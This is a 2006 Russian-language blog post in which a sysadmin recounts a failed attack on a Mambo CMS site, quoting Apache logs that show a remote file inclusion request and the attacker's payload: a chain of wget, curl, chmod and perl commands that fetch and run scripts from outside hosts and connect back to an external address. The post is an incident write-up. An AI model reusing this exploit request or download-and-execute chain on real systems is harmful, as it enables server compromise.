атака на мамбу

2006-Aug-03, Thursday 12:39
ypq: (Default)
[personal profile] ypq
мамба - это такой веб-контент-менеджер.
далее может быть интересно только для старого PQHC staff и коллег.

сначала в логе апача на сайте с мамбой появились такие записи:
217.160.92.162 - - [05/Jul/2006:02:47:21 +0600] “GET /thisdoesnotexistahaha.php HTTP/1.1” 404 305 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:21 +0600] “GET /mambo/index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 404 296 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:21 +0600] “GET /mambo/index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 404 295 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:22 +0600] “GET /index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 200 2993 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:23 +0600] “GET /index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 200 7964 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:48:09 +0600] “GET http://212.57.*.*//index2.php?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://209.240.156.100/text.txt?&cmd= HTTP/1.1” 200 606 “-” “-”
217.160.92.162 - - [05/Jul/2006:02:53:10 +0600] “GET http://212.57.*.*//index.php?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://209.240.156.100/text.txt?&cmd= HTTP/1.1” 200 - “-” “-”


внутри text.txt с 209.240.156.100 вот такая строчка (весь text.txt - это скрипт с HTML-тэгами, которые лень тут скринить):
‘wget http://www.pulaingurata.com/a.php;curl http://www.pulaingurata.com/a.php;wget http://209.240.156.100/ping.txt;mv ping.txt temp2006;perl temp2006 65.71.45.25 80;wget http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80;curl -o ping http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80;cd /tmp/;curl -o temp2006 http://209.240.156.100/ping.txt;while [ 1 ];do perl temp2006 65.71.45.25 80;done;wget http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80;curl -o ping http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80’


все бы ничего, да вот не оказалось там ни wget, ни curl.

поэтому, в error-логе соответственно:
[Wed Jul  5 02:47:21 2006] [error] [client 217.160.92.162] File does not exist: /www/root/thisdoesnotexistahaha.php
[Wed Jul  5 02:47:21 2006] [error] [client 217.160.92.162] File does not exist: /www/root/mambo/index2.php
[Wed Jul  5 02:47:21 2006] [error] [client 217.160.92.162] File does not exist: /www/root/mambo/index.php
wget: not found
curl: not found
wget: not found
mv: rename ping.txt to temp2006: No such file or directory
Can’t open perl script “temp2006”: No such file or directory
wget: not found
chmod: ping: No such file or directory
./ping: not found
curl: not found
chmod: ping: No such file or directory
./ping: not found
curl: not found
Can’t open perl script “temp2006”: No such file or directory
Can’t open perl script “temp2006”: No such file or directory


однако, “процесс пошел” и вот этой последней строчкой про отсутствие temp2006 забил весь раздел с /var. после чего был прибит вместе с мамбой.

ну, Семен Семеныч...

содержимое ping.txt... - домашнее задание для младших соратников PQHC. (вернусь - проверю!)

мораль: а нефиг пользоваться всякой попсой.

upd: (вдогонку) все адреса абсолютно реальны!
Tags:
  • Add Memory
  • Share This Entry
Page generated 2026-Jan-11, Sunday 22:15
Powered by Dreamwidth Studios